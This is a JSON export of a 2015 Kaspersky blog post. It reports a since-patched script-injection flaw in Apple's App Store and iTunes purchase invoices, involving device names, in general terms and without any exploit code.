{"id":4337,"date":"2015-08-06T15:55:00","date_gmt":"2015-08-06T15:55:00","guid":{"rendered":"http:\/\/kasperskydaily.com\/b2b\/?p=4337"},"modified":"2019-11-15T07:02:53","modified_gmt":"2019-11-15T12:02:53","slug":"apple-invoice","status":"publish","type":"post","link":"https:\/\/www.kaspersky.com\/blog\/apple-invoice\/4337\/","title":{"rendered":"An invoice bug in Apple’s stores: a big trouble that passed by"},"content":{"rendered":"

Apple patched <\/a>a serious issue in its App Store and iTunes Store, which could have undermined many\u00a0of the businesses working in this ecosystem. A remote attacker could inject malicious script into invoices that came from Apple, which would subsequently lead to session hijacking, phishing, and redirect.<\/p>\n

An invoice bug in Apple\u2019s stores: a big trouble that passed by #security<\/p>Tweet<\/a><\/blockquote>\n

The information about the vulnerability became public late in July, while Apple had apparently patched the flaw a month prior \u2013 so the flaw isn\u2019t there anymore.<\/p>\n

The issue, an application-side input validation web vulnerability, was tied to the fact that when it comes to purchase invoices, Apple uses the name of users\u2019 devices. According to Threatpost\u2019s publication<\/a>, it is something that attackers can manipulate via script code. User device names are usually arbitrary, but according to the security expert who discovered the bug, the App Store and iTunes take that device value and encodes it \u201cwith the wrong conditions.\u201d<\/p>\n

This means if an attacker were to put their code through Apple\u2019s invoicing system, it would result in an application-side script code execution. After a purchase from either the App Store or iTunes, the invoice gets sent to the target\u2019s email and triggers the malicious code.<\/p>\n

Severity level of this vulnerability is (was) considered high. Aside from the proof of concept, there are no reports of actual exploitation of the flaw, which is definitely good news.<\/p>\n

In general, Apple\u2019s software and its stores have a good reputation, security-wise. The company invests a lot of effort in security, even though hiccups do occur<\/a>, albeit quite rarely.<\/p>\n

Blind confidence is not good \u2013\u00a0especially with #cybersecurity<\/p>Tweet<\/a><\/blockquote>\n

That\u2019s why the revelation of this bug is especially noteworthy. The possible attack would put at risk many businesses and individuals, who have become comfortable in\u00a0assuming nothing perilous comes from Apple\u2019s software and media stores. However, this particular bug shows that its infrastructure is not necessarily impeccable.<\/p>\n

https:\/\/business.kaspersky.com\/android-financial-attacks-and-current-security-status\/3901<\/p>\n

This is a wide-scale problem, not limited to Apple\u2019s stores (cybercriminals would rather choose other systems than Apple\u2019s platforms<\/a>). So it is highly recommended to stay alert \u2013 always \u2013 and keep security solutions active constantly.<\/p>\n","protected":false},"excerpt":{"rendered":"

Apple patched a serious issue in its App Store and iTunes Store, which could have undermined many of the businesses working in this ecosystem.<\/p>\n","protected":false},"author":209,"featured_media":15336,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1999,3052],"tags":[2329,14,27,268],"class_list":{"0":"post-4337","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-business","8":"category-smb","9":"tag-app-store","10":"tag-apple","11":"tag-itunes","12":"tag-vulnerabilities"},"hreflang":[{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/apple-invoice\/4337\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/apple-invoice\/4337\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/apple-invoice\/4337\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.com\/blog\/tag\/app-store\/","name":"App Store"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/4337","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/209"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=4337"}],"version-history":[{"count":2,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/4337\/revisions"}],"predecessor-version":[{"id":30435,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/4337\/revisions\/30435"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/15336"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=4337"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=4337"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=4337"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}